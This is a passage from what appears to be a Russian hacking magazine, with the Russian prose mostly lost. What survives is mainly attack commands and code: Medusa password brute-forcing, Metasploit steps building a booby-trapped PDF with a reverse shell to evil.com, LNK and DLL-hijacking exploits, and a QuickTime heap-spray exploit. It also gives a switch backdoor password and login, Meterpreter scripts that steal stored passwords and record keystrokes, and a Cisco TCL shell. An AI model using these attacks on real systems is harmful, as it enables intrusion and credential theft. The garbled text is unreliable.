medusa -h victim.com -u root -P passwords.txt -M ssh

, 32 ,
Imperva (imperva.com/ld/password_report.asp).
. .
, THC-Hydra (freeworld.thc.org/thc-hydra/)
Medusa (foofus.net/~jmk/medusa/medusa.html).
, BackTrack4,

h, -u ;
-P ;
-M .
, .
SMB:

- ( *nix- ).
: , , -

medusa -M smbnt -C combo.txt

. ,
: Medusa , Hydra

combo.txt ::. :

. .
, ,
foofus.net/~jmk/medusa/medusa-

compare.html ( ):
TELNET, AFP, CVS, FTP, HTTP, HTTPS, SOCKS5, HTTP-PROXY,
IMAP, MS-SQL, PostgreSQL, MySQL, NCP (NetWare), NNTP,
PCNFS, PcAnywhere, POP3, rexec, rlogin, rsh, Teamspeak,
SMB, SMBNT, SAP/R3, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN,
Telnet, VmAuthd, VNC, Cisco auth, ICQ, LDAPx ..

192.168.0.2:administrator:password
192.168.0.2:testuser:pass
192.168.0.3:administrator:blah
192.168.0.4:user1:foopass

,
.
, , XHydra :).
. . ,
passwords.ru -

: ,
:). Medusa
2.0, Hydra 5.7. - , .

040

.
awlg.org/index.gen,
, .

:
EXE, DLL

:
, ,
, -
. , . , . ,
:). .
, ,
, OllyDbg (wasm.
ru/series.php?sid=17). , ,
- .
. . !
. , , , -
, . . ,
, Quick
Unpack 2.2 (qunpack.ahteam.org/?p=436). ! , , ,
exe. , UPX, ASPack, PE Diminisher,

UPX, QuickUnpack
PECompact, PE-PACK, PackMan, WinUPack .
,
DLL, , ,
, OEP finder,
LUA ( ). ,
:). ,
OEP finder .

:
. , 3G GPRS, , . ,
- . .
.
CanSecWest 2010 Collin
Mulliner
(mulliner.org/security/feed/random_tales_mobile_hacker.pdf).
DoS .
,
, .
,
HTTP-. ,
, ,
, . MSISDN ( ), IMEI (
) IMSI ( ). .
, .

: IP-

:
, , :).
, /
- .
, ,
, VPN,
. ,

:
SIM, , - ?
( ) . , , -. , .
mulliner.org/pc.cgi. , ,
. , .
, ,
, , 3G- ,
.

.
. , ,
- .
ipaddresslocation.org, worldips.info,
IP.
, (RIPE, RIPN, etc.) .
RIPN (ru-center) - ipgeobase.ru.
, -
, - ,
- . :).
whois.

041

: WINDOWS ,

:
CC10,
Windows.
, ,
, :). ,
party10.cc.org.ru.
: , , Win7
.
. , ,
. ( , , Adobe, Mozill) .
,
DEP, ASLR ..
. ,
.
.
! MS , ,
, (
) , .
EMET 2.0, Enhanced Mitigation Experience Toolkit (blogs.technet.
com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkitemet-v2-0-0.aspx)
DEP,
SEHOP, ASLR , . ,
( , ) : DEP, ASLR, SEHOP,
heapspay .
, , , .
. MS: 0day-

ASLR Acrobat Reader.


DLL EMET -ASLR-, ROP

Acrobat Reader Win7 DEP, ROP,


, -ASLR- EMET
(blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-theadobe-0-day-exploit.aspx)
: technet.microsoft.com/en-us/security/ff859539.
aspx
WinXP c SP3, SEHOP
ASLR .
Win7 Win2008.

: ,
CLIENT-SIDE-

:
. -.
?
:). ,
- .
. ,
, DoS, . ,
, IDS, .
/, ,
, .
/
:). ,
Microsoft Adobe, - . ,
! :
Adobe Acrobat PDF Cooltype Sing ( <=9.3.4/8.2.4), MS DLL Hijacking,
MS LNK (MS10-046).

. , Metasploit
Framework. MSF
.
MSF, PoC. 0-day,
MSF. - , .
1) Adobe Acrobat PDF Cooltype Sing. Adobe
. . msfconsole :

042

Acrobat Reader. :)
:
msf > use exploit/windows/fileformat/adobe_cooltype_sing
:
msf > set FILENAME xakep_ubileinyi_vypusk.pdf
? home:
msf > set OUTPUTPATH ~
:
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com

MS Office

msf > set LPORT 80

evil.com netcat, ,
.
, -, NAT, ,
-, (
Acrobat Reader).
,
Adobe exploit/windows/browser/adobe_cooltype_sing.
2) MS LNK (MS10-046). :)
:
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
:
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.101

, WebDAV .
,
. (
WebDAV). - :).
DLL .
, , .
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 D > evil.dll

:
windows/meterpreter/reverse_tcp ,

LHOST=192.168.0.101
D , DLL;
evil.dll .

3) MS DLL Hijacking
! - .
-
AutoCAD, . - . . , , , !
. !
:).
:
:
msf > use windows/browser/webdav_dll_hijacker
:
msf > set BASENAME policy
:
msf > set EXTENSIONS ppt
:
msf > set SHARENAME docs
:
msf > set PAYLOAD windows/meterpreter/bind_tcp

\\192.168.0.101\
docs\, HTTP- http://192.168.0.101:80.
. :).
, ,
WebDAV. z

043


, Digital Security a.sintsov@dsec.ru

01

DLL
HIJACKING

TARGETS

Windows XP
WIndows 7
Windows 2000/2003/2008
CVE

N/A
BRIEF

- Microsoft.
. , (Simon
Raner) Arcos Apple iTunes , , DLL-
. ,
, .
,
WebDAV.
, - . , Apple iTunes,
DLL, . ,
2010 ,
, 2000 . , 10
(Georgi Guninski)
, Windows
.DLL-, Microsoft
Office. , , , ,
, , . (, ,
). , ,
, Metasploit.
, ,
, , .
EXPLOIT

.
Windows :). , , .
, API- LoadLibrary

044

( ). ,
, DLL; ,
:
LoadLibrary("bzik.dll");

, DLL- ,
, .
Windows , ,
, :
1. , ;
2. ;
3. 16- ;
4. Windows;
5. ;
6. PATH.

,
, . , (.TXT- ,
.TORRENT uTorrent, .XLS Excel ..) D:\zloba,
.
, , ,
. ,
HTTP WebDAV. , bzik.dll
PATH, ,
, , bzik.dll , D:\zloba,
PATH. ,
D:\zloba bzik.dll?
. : , DLL-,
,
. uTorrent, P2P,
.TORRENT.
,
.
c .TORRENT.
, ProcessExplorer,
utorrent.exe.
.
.TORRENT- . ,

DLL Hijacking
utorrent.exe
. -
.DLL- ,
plugin_dll.dll. plugin_dll.dll
.
,
msfpayload Metasploit:
$ msfpayload windows/exec CMD=calc D > plugin_dll.dll

- .TORRENT-
, . , , Rapid7 https://www.metasploit.
com/redmine/projects/framework/repository/raw/external/source/
DLLHijackAuditKit.zip ( FAQ United). , exploit-db.com/
dll-hijacking-vulnerable-applications/.
DLL,
API- ,
(Taeho Kwon) (Zhendong
Su) cs.ucdavis.edu/research/tech-reports/2010/CSE-20102.pdf. ,
, ,
, .

DLL Hijacking
, ,
:
SetDllDirectory("");

, LoadLibrary.

02

APPLE
QUICKTIME

TARGETS
SOLUTION
,
, Microsoft - , :
;

WebDAV;

WebDAV, .


* Apple QuickTime < 7.6.8


CVE

CVE-2010-1818
BRIEF
,
, , , ..
- .
, . ,

Apple, QuickTime.
,

045

DLL Hijacking
QuickTime
- (Ruben Santamarta)
ActiveX- QuickTime.
EXPLOIT

,
_Marshaled_pUnk. ActiveX
:
push    offset a_marshaled_pun            ; "_Marshaled_pUnk"
push    ebx
call    ebp                               ; lstrcmpiA, compare with "_Marshaled_pUnk"
test    eax, eax
jnz     short loc_10002C4A
push    edi
call    sub_10001310                      ; returns LONG
add     esp, 4
lea     ecx, [esi+13B8h]
push    ecx                               ; ppv
push    offset iid                        ; iid
push    eax
call    ds:CoGetInterfaceAndReleaseStream ; iStream (eax)!

, , _Marshaled_
pUnk, . , ,
. ,
QuickTime (6.5.1.17)
,
, ,
. ,
, ,
. ,
, iStream
vTable. , Heap
Spray , ROP-
DEP . ROP
vTable:
Heap addr    Value
15220c20     15220c18    // VTable -- CALL [15220c18+0x0C]
15220c24     ROP_ADDR    // ROP-gadget
15220c28     ROP_ADDR    // ROP-gadget
15220c2c     ROP_ADDR
15220c30     ROP_ADDR

Heap Spray 0x15220000,


:
var targ = 0x15220c20;
var obj = '<' + 'object classid="clsid:02BF25D5-8C174B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ +
'"' + '/>'
+ '</'+ 'object>';
document.getElementById('xpl').innerHTML = obj;

Metasploit,
QuickTime :).
, 7.6.7
Windows XP SP3. ASLR, . , ROP-,
ASLR.

SOLUTION


QuickTime ( 7.6.8).

03

TARGETS

* 3Com 3812
* 3Com 3870
* Edgecore ES4649
* Dell PowerConnect 5224
*
CVE

N/A


:)
BRIEF

,
, HAR2009,
(Edwin Eefting), (Erik Smit)
(Erwin Drent) , , Accton,
.
, ,
, , , .
,
, , . , ,
?
EXPLOIT

: Linux ,
-
: __super. - ,
, . ,
,
,
, .
, ,
MAC- . , ,
MAC, , , ...
. , - ,
, .
- , MAC-. ,
, , ARP-, , , SNMP-.
, SSH,
telnet- HTTP-. __super.
:
1. MAC :
# arp -an | grep 10.0.1.2
? (10.0.1.2) at 00:0E:6A:CB:B4:41 [ether] on eth0

2. :
# perl accton.pl 000E6ACBB441
!!98DMlH

3. :
# telnet 10.0.1.2
Trying 10.0.1.2...
Connected to 10.0.1.2.
Escape character is '^]'.
Login: __super
Password: !!98DMlH
Menu options: -------3Com SuperStack 3 Switch 3824 24port--------------------
bridge            - Administer bridge-wide parameters
feature           - Administer system features
gettingStarted    - Basic device configuration
logout            - Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol          - Administer protocols
security          - Administer security
system            - Administer system-level functions
trafficManagement - Administer traffic management

Acrobat Reader , VeriSign

MAC-.
, :).
SOLUTION

IP-:

047

Acrobat Reader
Console#config
Console(config)#management ?
all-client Adds IP addresses to SNMP, Web and Telnet
groups
http-client Adds IP addresses to the Web group
snmp-client Adds IP addresses to the SNMP group
telnet-client Adds IP addresses to the Telnet group
Console(config)#management all-client ?
A.B.C.D Starts IP address
Console(config)#management all-client 192.168.1.1 ?
A.B.C.D Ends IP address
Console(config)#management all-client 192.168.1.1 192.168.1.10

, ,
.
- . , ,
, , . -
Full-Disclosure :).

04

Acrobat Reader,

.
.
,
DEP, ASLR.
ROP , ASLR. -
,
. , PDF-

. .
EXPLOIT
. , , . ,
Acrobat Reader SIGN- TrueType.

-...

ADOBE ACROBAT READER

TARGETS

* Adobe Acrobat Reader <= 9.3.4


CVE

CVE-2010-2883

048
48

BRIEF

Abysssec 0-day.
, ,
, Po.
Micrososft, Mozilla, Sun, Novell, HP ..
exploit-db.com,
, . abysssec.com/
blog/2010/09/moaub-1.


Acrobat Reader Windows 7


, uniqueName,
. ,
strcat.
. ,
uniqueName ,
.
:
ROP-,
0x0C0C0C0C. Heap Spray ROP. , , . DEP. ,

API-, VirtualProtect/VirtualAlloc WriteProcessMemory,
. iso88591 ,
API- CreateFileA. ROP-
CreateFileMappingA,
MapViewOfFile .
DEP.
LPVOID MapViewOfFile(
    HANDLE hFileMappingObject,   // handle from CreateFileMappingA
    DWORD dwDesiredAccess,       // 0x22 = FILE_MAP_EXECUTE | FILE_MAP_WRITE
    DWORD dwFileOffsetHigh,      // 0
    DWORD dwFileOffsetLow,       // 0
    SIZE_T dwNumberOfBytesToMap  // 0x1000
);

,
, .

( memcpy).
,
. ROP DEP, ASLR,
ROP-
icucnv34.dll, ASLR,
, Windows 7.
,
Metasploit !
SOLUTION

Adobe Acrobat Reader .z

049


, Digital Security a.sintsov@dsec.ru

BANK
CLIENT

-:


- (IPS, AntiVirus, ); , ,
.
.
, WEBMONEY PAYPAL,
,
.
, ,
, -
.

050

, ,
, .
, ,
. ,
, (

Inter-PRO - BoF
), -. :
, ,
. .
(
),
.

(, ..), , , .
. ()
,

/ / , . - , ,
.
( ). ,
(, , ..) , .
, . ,
, , .
. , :
1. -;
2. ;
3. ( );
4. ;
5. ;
6. .

. -, .. ..

,
-. :

-
-
-
-
ATM-

, ,
. ,
! , ,


34.10 2001 (: )
,
.
,
, ,
, , , , .

. ,
- (
Java) , , , Java- ActiveX,
( ,
). ActiveX? ,
Windows
. ,
.

-
, , , ActiveX ,
.
, .

, ,
. ,
.

.
, , .. .
,
.
, .

, ? -,

051

, , ,

.
, , , - , .
,
,
- () ( ).
.
, ,
, -
-. , , , ,
, , , ,
. ? :) .
1 ERP- , ,
, .

: - , . ,
, ,

. , ,
, . ,
, ,
, .
, ,
. , - ,
, , , . , ,
, , ,
, , ,
, . ,
, ( ,
). ,
,
(). ,
!
34.10 2001. - 34.11-94.
,
.

USB-Token

, - .. , USBToken . USB-Token?
USB-,
. -

052

-
, ,
( )
. , . , ,
R-Admin,
USB . ,
,
. USB-Token . , .
Token ..,
,
.
: , ,
, , , , -,
.

, , ,
. :

WiFi

, (
)
WiFi ( WEP,
, WiFi,
MAC-, 3Com-,
3Com-, ,
, ).
- , ,
,
IP-
( ARP-SPOOF
HASH+CONST handshake Ranibow-Table profit!).
, ,
, netbios
: BANK01, BANK02. ,
, ,
-
. WiFi-,
, .

.
, , ,
,
- :). ,
, ... ,
,
, ..

-
USB-oken,
, -,
, .
( , , 2-3
WiFi-, , ) ,
.
- , ,
. .
: , ,
, ,
,
HDD . , IDS IP , ,
.

.
,
. , , ,
, -
. -
, .
, , ,
. , ,
, -.
, , ,
, exploit-pack, Acrobat Reader, - .
. , -
. .
, , . : ,
. .
- , - - .
ERP- ( 1C, ),
( ) , ( , )
, , 700 .
,
, - . , . , -, , ,
.
, -,

, - , ( USB), ,
.. ..
( ][ #112,
). , /
, , .
, , ,
USB-Token , ,
- ,
( ).
.
, , , ,
. ,
. , ,
. . -, ,
N, ,
.
. , ,
, . -
,
, , ,
:). ,
, (, ,
) . , . , , , , !

, , .
, , ,
- ,
.
: XSS-, SQL-,
, ..,
.. ,
- -. ,
, , ,
,
, .
:
, , , , , .
: .
, , .
, ,
, (
CSRF) , update . ,
,
.
SQL- XSS

053

0day

, - .
, ,
, ActiveX -
(BSS). ,
, ,
.
,
. .
(Inist, R-Style).
,
ActiveX (
CC10
?.
.
). ,
ActiveX, , ,
Faktura.ru :). (
). ,
. ,
... ,
, . ,
ActiveX, ,
( , DSecRG,

). , -
ActiveX, ,
( ,
).
, , Inter-PRO - , .
, ( , ). ,
( ActiveX,
- ). ( )
, Inter-PRO (DoS).
, , ( ),
-.

(
, , -,
). , . , -

054

/GS (, GS,
,
DoS Code Execution). ,
, Permanent DEP, ASLR, SEHOP, GS
, . InterPRO GS, , . ,
Flash, Acrobat Reader, Windows
..,
, -
( , ).

? , ,
, ,
- , .

1) ;
2)
;

3) ;
4) USB-oken

!
5) ;
6) , ,
. ;
7)
IP , ( );

8) -;
9) , , . ;

10) ;
11) ,
, .
, , ,
, , . - ,
-, , , - .
.
, ,
...z

r GreenDog agrrrdog@gmail.com

METERPRETER

MSF

,
Metasploit Framework. , MSF
Meterpreter. advanced payload ,
, , .
MSF METERPRETER
( )
, -
. , msfgui, . msfgui
:).
, , MSF,
Meterpreter (MP) - . , .

Meterpreter , MSF , ,
- .
(/bin/sh, cmd.exe)?
, :). ,
, . -,
.
. -, IDS
: , -,
. -, chroot, ,

. -, ,
, , .

.
, , ?. -, MP .
?
:). . ,
MP ,
.
Windows- ( ,
cmd.exe -
:). Linux ,
. Mac 2009 Charlie Miller Vincenzo Iozzo.
Win- MP ( ,
).
dll .
MP . - MP dll,

. , MP

055

.bashrc

, , . , MSF. Ruby,
Meterpreter API :). -, .
MP- hashdump
- ( h :), ][
.

Railgun. ,

dll . MP
DLL: dll injection reflective dll injection.
. ,
(PEB) . .
chroot / MP
.
, / ,
/. - MP ,
dll ,
, MP . -
Meterpreter xor.
MP .
, heap jit-
, , ,
.
, , ,
. ( ) . -
. MP (migrate)
. , -,
- (
), , -,

, .

056

MP , .
. ,
, MP .
,
MP -. , antimeter2 mertsarica.com
MP.

meterpreter

. , MP Win, .
MP PHP JAVA.
? :).
. ,
MP, .
PHP MP php ,
- - ,
LFI SQL-. , dll-
. ,
, , , .
, , . PHP JAVA MP
.

MP, , .
,
. API Rex ( MSF) MSF. API metasploit
( ), (2004 .) MP, - , API (
\msf3\documentation). ,
, -

Meterpreter
MP
.
(, , :).
, .
,
API. , .
:
tmpout = ''
cmdout = ''
r = client.sys.process.execute("command.exe", nil, {'Hidden' => true, 'Channelized' => true})
while (d = r.channel.read)
  tmpout << d
end
cmdout << tmpout
r.channel.close
r.close

:
cmd_exec(cmd)

. :
key = 'HKLM\\System\\...'
root_key, base_key = session.sys.registry.splitkey(key)
value = "Value"
open_key = session.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0)

:
registry_setvaldata(key,valname,data,type)

, MSF

MSF.
MSF . , .
.
-, MSF *nix Meterpreter.
UTF, MP cp1251, 866. ,
, .
http://takeworld.blogspot.com/2008_11_01_archive.html.
MSF
cygwin.
.bashrc, , :
export LANG="ru_RU.CP1251"
alias ls='ls --show-control-chars'

(\msf3\lib\msf\). MP ,
.
( MSF
). MP
Carlos Perez. , darkoperator.com,
, , .
:
run bgrun ;
session s msf-;
AutoRunScript InitialAutoRunScript .
, :
metsvc, scheduleme, persistence MP
;
autoroute
;
scraper, checkvm, winenum, get_env, enum_powershell_
env, enum_logged_on_users, domain_list_gen,
remotewinenum ;
get_local_subnets, netenum, arp_scanner, dumplinks
;
get_application_list, enum_vmware, prefetchtool
;
getgui, gettelnet, vnc RDP, telnet
VNC-;
getcountermeasure, killav AV, UAC, ;
hashdump, credcollect, , ;
winbf ;
screen_unlock ;
wmic wmic-;
schtasksabuse ;
enum_firefox, enum_putty, getvncpw, get_filezilla_
creds, get_pidgin_creds ;
panda_2007_pavsrv51, pml_driver_config, srt_webdrive_
priv, kitrap0d ;
search_dwld, file_collector - ;
migrate, keylogrecorder, packetrecorder
MP;
multicommand, multiscript, uploadexec
.

, . , -
. .
.
,
, , , ,
. ,
nirsoft.
net, ,
. ( ) :
session = client
host,port = session.tunnel_peer.split(':')

057

Windows File Protection.

end
r.channel.close
r.close
#
session.sys.process.execute("cmd.exe /c del
#{tmp}\\#{passrecscranble}.exe", nil,
{'Hidden' => 'true'})
#


RDP

session.fs.file.download_file(
"#{logs}#{::File::Separator}#{exename}.txt",
"#{tmp}\\#{logscranble}")

# Temp
tmp = session.fs.file.expand_path("%TEMP%")

print_status(
"Finnished downloading logs with passwords")

# ,

session.sys.process.execute(

logs = ::File.join(Msf::Config.config_directory,
'logs', 'getpass',

"cmd.exe /c del #{tmp}\\#{logscranble}",


nil, {'Hidden' => 'true'})

host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))

getpass(session,tmp,logs,"PasswordFox.exe")

, ,
. : ,
, PasswordFox.exe data msf3.

def getpass(session,tmp,logs,exename)

::FileUtils.mkdir_p(logs)
#

# ,
#
passrecexe = File.join(Msf::Config.install_root,
"data", "#{exename}")
passrecscranble = sprintf("%.5d",rand(100000))
logscranble = sprintf("%.5d",rand(100000))
session.fs.file.upload_file(
"#{tmp}\\#{passrecscranble}.exe",

. , .
. Patrick HVE - MP.
Railgun! ? .
API. ,
dll . , ?
:) MP ( irb):

"#{passrecexe}")
#
#

>>client.core.use("railgun")
>>client.railgun.user32.MessageBoxA(0,"Hello, world!","Test","MB_OK")

r = session.sys.process.execute("cmd.
exe /c #{tmp}\\#{passrecscranble}.exe /stext
#{tmp}\\#{logscranble}", nil,
{'Hidden' => 'true','Channelized' => true})
sleep(2)
#
prog2check = "#{passrecscranble}.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)

, .
railgun:
1) client.railgun.{DLL-Name}.{FunctionName}
({Parameters});
2) . ,
return GetLastError;
3) . api_constants.rb;
4) NULL, nil;
5) , .
railgun (. msf3\lib\rex\post\meterpreter\extensions\
railgun\api.rb) 1000 API kernel32, user32, ntdll,
ws2_32. , dll:

found = 0
end
end

058

>>client.railgun.add_dll('smartcard','c:\\program files\\smartcard\\smrtcrd7823.dll')

=>
>>
=>
>>



:
railgun.add_function( 'kernel32',
'ReadFile', 'BOOL',[
["DWORD","hFile","in"],
["PBLOB","lpBuffer","out"],
["DWORD","nNumberOfBytesToRead","in"],
["PDWORD","lpNumberOfBytesRead","out"],
["PBLOB","lpOverlapped","inout"],
])


railgun.
.
( ):
# load the railgun extension
client.core.use("railgun")
# bitmask of logical drives: bit i set means drive letter i exists
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# decode the bitmask into drive letters, clearing each bit after it is read
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
  test = letters[i,1]
  rem = a % (2**(i+1))
  if rem > 0
    drives << test
    a = a - rem
  end
end
print_line("Drives Available = #{drives.inspect}")

:
MP
meterpreter > bgrun keylogrecorder -c 1 -t
15

meterpreter > irb
>> client.core.use("railgun")

true
client.railgun.user32.LockWorkStation()
{"GetLastError"=>0, "return"=>true}
exit

,
, . ,
,
.
m0r0 :
. , : forum.antichat.ru/
threadnav99665-1-10.html. : -
WinXP,
RDP. termsrv.dll .
RDP,
. , ,
Windows File
Protection , dll. . MP
. , railgun,
.
, .
, ,
WinAPI. WinAPI. -, MP
,
:
kernel32.MoveFileA("c:\\windows\\system32\\
termsrv.dll","c:\\windows\\system32\\
termsrv.old")

-,
:
parHWND=user32.FindWindowA("#32770",nil)

:
chHWND=user32.FindWindowExA(parHWND["return
"],0,nil,
"#{cancel}")

:
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONDOWN",0,0)
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONUP",0,0)

HTTP://WWW
links
PHP Meterpreter
blog.metasploit.
com/2010/06/meterpreter-for-pwnedhome-pages.html
Java Meterpreter
schierlm.users.
sourceforge.net/
JavaPayload/
metasploit.com/redmine/issues/406
metasploit
metasploit.com

meterpreter API
metasploit.com/
documents/meterpreter.pdf
MP
darkoperator.com
WinAPI
Railgun
msdn.microsoft.
com/en-us/library/
aa383749

msdn.microsoft.
com/en-us/library/
ms681381
(VS.85).aspx
WinAPI
undocumented.
ntinternals.net/;
source.winehq.org/
WineAPI/

dll injection nologin.org/


Downloads/Papers/
remote-library-injection.pdf
Reflective dll injection harmonysecurity.com/ReflectiveDllInjection.html
harmonysecurity.com/
files/HS-P005_ReflectiveDllInjection.pdf

.
MSF :).

, Meterpreter ,
,
, , .
! , . :).z

059


r0064 r0064@mail.ru

Windbg

Windbg ,
. , , ...
.
,
64- .
, , X64- WINDBG ,
64- WINDOWS,
32-
.

WinDbg . :

, (
, ). Ida.
interfaces. ,
( ). interfaces
.
, :
.text:0000000180012920 public interfaces
.text:0000000180012920 interfaces proc near
.text:0000000180012920 mov [rsp+arg_18], r9d
.text:0000000180012925 mov [rsp+arg_10], r8
.text:000000018001292A mov [rsp+arg_8], rdx

.load _

.unload.
, ndis, ndiskd, Windbg 6.11.1.404
(ndiskd.dll WDK \Debugging
Tools for Windows (x64)\winxp). , !ndiskd.interfaces :
Can't get offset of Link in NDIS_IF_BLOCK!.
opens, protocols . , . ,

060

.text:000000018001292F mov [rsp+arg_0], rcx
.text:0000000180012934 push rbx
....
.text:00000001800129AF lea r8, [rsp+0C8h+var_2C]
.text:00000001800129B7 lea rdx, aLink ; "Link"
.text:00000001800129BE mov rcx, cs:NDIS_IF_BLOCK_NAME ; Link NDIS_IF_BLOCK
.text:00000001800129C5 call GetFieldOffset
.text:00000001800129CA test eax, eax


WinDbg fdbg

.text:00000001800129CC jz short loc_1800129E0
.text:00000001800129CE lea rcx, aCanTGetOffs_22

DriverEntry ?
, , int 3 ,
. ? , . , WinDbg
,
. . IopLoadDriver. ,
, ,
( ,
). Vista (
, IopLoadDriver):

; "Can't get offset of Link in NDIS_IF_BLO"...
.text:00000001800129D5 call cs:ExtensionApis.lpOutputRoutine+4
.text:00000001800129DB jmp loc_180012BF1

, Link NDIS_IF_BLOCK_NAME. ,
NDIS_IF_BLOCK_NAME.
.text:0000000180001260 aNdisNdis_if_bl db 'ndis!NDIS_IF_BLOCK',0

:
dt ndis!NDIS_IF_BLOCK

, : Symbol ndis!NDIS_IF_BLOCK not found. dt ndis!_NDIS_IF_BLOCK . ,
, . - hex-.
010 Editor. . ,
, .
.
, ,
, .
, ndis!LIST_ENTRY :
.data:0000000180018470 LIST_ENTRY_NAME dq offset aNdis_list_entr ; DATA XREF: pktpools+5Dr

, 68 14 00 80 01 00 00 00. -
.
ndiskd .

PAGE:00000001403AC40A loc_1403AC40A:           ; IopLoadDriver+98Bj
PAGE:00000001403AC40A mov rdx, rsi
PAGE:00000001403AC40D mov rcx, rbx
PAGE:00000001403AC410 call qword ptr [rbx+58h]  ; DRIVER_OBJECT.DriverInit

, , 0x58 DRIVER_OBJECT
DriverInit, kd dt _DRIVER_
OBJECT.
:
48 8B D6 48 8B CB FF 53 58

,
WinDbg:
s nt!IopLoadDriver L2000 48 8B D6 48 8B CB FF 53 58

s , nt!IopLoadDriver
, L2000 ,
, 48 8B D6 48 8B CB FF 53 58 , .
- :
fffff800`01c0940a 48 8b d6 48 8b cb ff 53-58 4c 8b 15 5e 20 dd ff H..H...SXL..^ ..

.
. fffff800`01c0940a. .
, int 3 .

WinDbg ,
. . -

061

ndiskd

ida


Major- DRIVER_OBJECT, driver object .

!drvobj .
driver object tdx.sys.

.block
{
    .catch
    {
        r $t0 = $arg1
        .printf "Driver object at 0x%I64X\n",@$t0
        r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
        r $t0 = @@c++(@$t1->Type)
        .if(@$t0==4)
        {
            r $t0 = @@c++(@$t1->MajorFunction)
            .for(r $t1=0;@$t1<1c;r $t1=@$t1+1)
            {
                r $t2 = @$t0+@$t1*8
                r? $t3 = *(void**)@$t2
                .printf " Function at 0x%I64X\n",@$t3
                .if(@$t3!=0)
                {
                    bp @$t3
                }
            }
        }.else
        {
            .printf "Not a driver object!\n"
        }
    }
}

$arg1 ( $argN), t0-t19


-. , ++ (
for, while...). DRIVER_OBJECT.
Type, , DRIVER_
OBJECT ( !).
DRIVER_OBJECT.
MajorFunction. Major- (
27 - 0x1b).
( ), (bp @$t3). .printf. 64- (8 ), r $t2
= @$t0+@$t1*8. 32- ,
4.

r, , r?, .

- -

062

kd> !drvobj tdx
Driver object (fffffa8001ea1330) is for:
\Driver\tdx
Driver Extension List: (id , addr)
Device Object list:
fffffa8001ec72f0 fffffa8001ec52f0 fffffa8001ec32f0 fffffa8001ec12f0
fffffa8001ebf2f0 fffffa8001ebd2f0 fffffa8001eb5300

.
$$><_, $$<_ ( $<).
,
$$>a<_ ( ).
,
device objecta, .
$$ $arg1 - driver object (DRIVER_OBJECT address, as printed by !drvobj)
$$ $arg2 - function number
.block
{
    .catch
    {
        r $t0 = $arg1
        .printf "Driver object at 0x%I64X\n",@$t0
        r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
        r $t0 = @@c++(@$t1->Type)
        .if(@$t0==4)
        {
            r $t0 = @@c++(@$t1->MajorFunction)
            r $t1 = $arg2
            $$ checking second argument
            .if(@$t1<1c)
            {
                r $t2 = @$t0+@$t1*8
                r? $t3 = *(void**)@$t2
                .printf " Function at 0x%I64X\n",@$t3
                .if(@$t3!=0)
                {
                    bp @$t3
                    u @$t3
                }
                .else
                {
                    .printf "Invalid function address\n"
                }
            }
            .else
            {
                .printf "Invalid function number: must be 0-1B\n"
            }
        }.else
        {
            .printf "Not a driver object!\n"
        }
    }
}

$$.
. DeviceObject.Type=4,
0-1B, IRP_MJ_CREATE IRP_MJ_PNP.
u @$t3
.
(
):
kd> $$>a<c:\do2.wds fffffa8001ea1330 2
Driver object at 0xFFFFFA8001EA1330
Function at 0xFFFFFA600A60D830
tdx!TdxTdiDispatchClose:
fffffa60`0a60d830 push rbx
fffffa60`0a60d832 sub rsp,20h
fffffa60`0a60d836 cmp rcx,qword ptr [tdx!TdxDeviceObject (fffffa60`0a61e650)]
fffffa60`0a60d83d mov rax,qword ptr [rdx+0B8h]
fffffa60`0a60d844 mov rbx,rdx
fffffa60`0a60d847 je tdx!TdxTdiDispatchClose+0x71 (fffffa60`0a60d8a1)
fffffa60`0a60d849 mov rcx,qword ptr [rax+30h]
fffffa60`0a60d84d cmp qword ptr [rcx+20h],2

010 Editor
,
WinDbg pykd ( ,
),
.
Python.

, WinDbg. , , ,
. ,
, . , ,
e-mail. z


WinDbg pykd,
[en/ru]:
pykd.codeplex.com/wikipage?referringTitle=Home

kd> $$>a<c:\do2.wds fffffa8001ea1330 24


Driver object at 0xFFFFFA8001EA1330
Invalid function number: must be 0-1B

Debugging Tools for Windows,


WinDbg [en/ru]:
microsoft.com/whdc/devtools/debugging/default.mspx

kd> $$>a<c:\do2.wds fffffa8001ea1350 7


Driver object at 0xFFFFFA8001EA1350
Not a driver object!

,
Windbg [en]:
windbg.info/download/doc/pdf/WinDbg_A_to_Z_color.pdf

, .
,
. ,


[en]:
dumpanalysis.org/WCDA/WCDA-Sample-Chapter.pdf

063


Positive Technologies

Shell

TCL-

TFTP-

./tftpboot/
.icmp.tcp

tftp://192.168.1.4/icmp.tcl

[ptsec@maxpatrol~}$ telnet router 2002


Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].
Cisco router admin console:
Router #

TFTP-
192. 168. 1. 4

CISCO

192. 168. 1. 10

TCL


Cisco Systems
(level 15),
TCL.
, ,

.
TCL (TOOL COMMAND LANGUAGE)
TK, 80- -
; expect IRC-
eggdrop,
apache mod_tcl. IOS, Cisco Tcl, IOS
12.3(2)T (cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/
gt_tcl.html),
Cisco Systems . ,
IOS IVR IP-.
Tcl,
,
:

064



;
;
, ()
;
() .

, TFTP- ,

.
.

Shell
[ptsec@maxpatrol~}$ telnet router 2002
Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].

tclsh tftp://192. 168. 1. 4/icmp.tcl

Cisco router admin console:


Router #
./tftpboot/
.icmp.tcp

TFTP-
()
192. 168. 1. 4

, ,

Telnet.
CTF 2010.
